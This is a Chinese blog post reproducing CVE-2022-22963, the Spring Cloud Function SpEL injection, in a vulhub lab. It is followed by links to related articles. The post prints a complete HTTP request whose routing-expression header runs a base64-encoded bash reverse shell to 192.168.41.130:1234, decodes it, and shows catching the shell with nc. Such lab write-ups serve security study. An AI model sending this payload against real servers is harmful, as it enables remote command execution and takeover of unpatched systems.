每日一漏洞(cve-2022-22963)

最新推荐文章于 2024-04-17 08:19:13 发布
最新推荐文章于 2024-04-17 08:19:13 发布
阅读量125 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/131793560
版权

环境搭建

cd vulhub/spring/CVE-2022-22963
docker-compose up -d

服务启动后,访问http://ip:8080

 漏洞复现

burp拦截修改数据包,修改post和添加spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xxxx")

POST /functionRouter HTTP/1.1

Host: 192.168.41.130:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Connection: close

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQxLjEzMC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}")

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

exec中的内容是反向shell,其中的Ym是base64加密的内容,如下

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQxLjEzMC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

 

  
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQxLjEzMC8xMjM0IDA+JjE=
bash -i >& /dev/tcp/192.168.41.130/1234 0>&1

准备好后,nc开始监听

 burp发送数据包

 nc获得shell

 

炼金术师诸葛亮
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Spring Cloud Function SPEL表达式注入漏洞CVE-2022-22963
chaojixiaojingang
04-06 7576
1.漏洞描述 SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
CVE-2022-22963-Spring-Core-RCE图形化利用工具_poc-yaml-cve-2022-22963-spring-spel-rce
最新发布
2401_83944297的博客
04-17 503
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!如果你能答对70%,找一个安全工作,问题不大。最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。
[春秋云镜]CVE-2022-22963
niubi707的博客
11-29 643
[春秋云镜]CVE-2022-22963复现
春秋云境:CVE-2022-22963
一只爱吃橙子的羊
01-20 815
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
CVE-2022-22963-Spring-Core-RCE图形化利用工具
LiBai'S BLOG
04-01 9732
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
oiadkt的博客
04-21 573
SpringCloud Function SpEL漏洞复现 (CVE-2022-22963)
Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)
不曾扬帆,何以至远方
07-18 2576
Spring Cloud Function SpEL Code Injection (CVE-2022-22963)
Spring Cloud Function SPEL表达式注入漏洞分析(CVE-2022-22963
panda的博客
04-05 2354
影响范围: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2 项目简介: Spring Cloud Function 是一个具有以下高级目标的项目: 通过函数促进业务逻辑的实现,可以将函数设置为HTTP端点。 将业务逻辑的开发生命周期与任何特定的运行时目标分离,以便相同的代码可以作为 Web 端点、流处理器或任务运行。 支持跨无服务器提供商的统一编程模型,以及独立运行(本地或在 PaaS 中)的能力。 在无服务器提供程序上启用 Spring Boo
『Java CVECVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1434
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
CVE-2022-22963:Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 863
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
春秋云镜 CVE-2022-22963 靶场详细解析
m0_61256404的博客
05-23 533
春秋云镜 CVE-2022-22963 靶场详细解析,SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
如何修复linux漏洞 CVE-2022-0847
07-15
要修复Linux漏洞CVE-2022-0847,您可以按照以下步骤进行操作: 1. 更新系统:确保您的系统已经更新到最新的软件包版本。使用以下命令更新软件包: ``` sudo apt update sudo apt upgrade ``` 2. 安装补丁:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值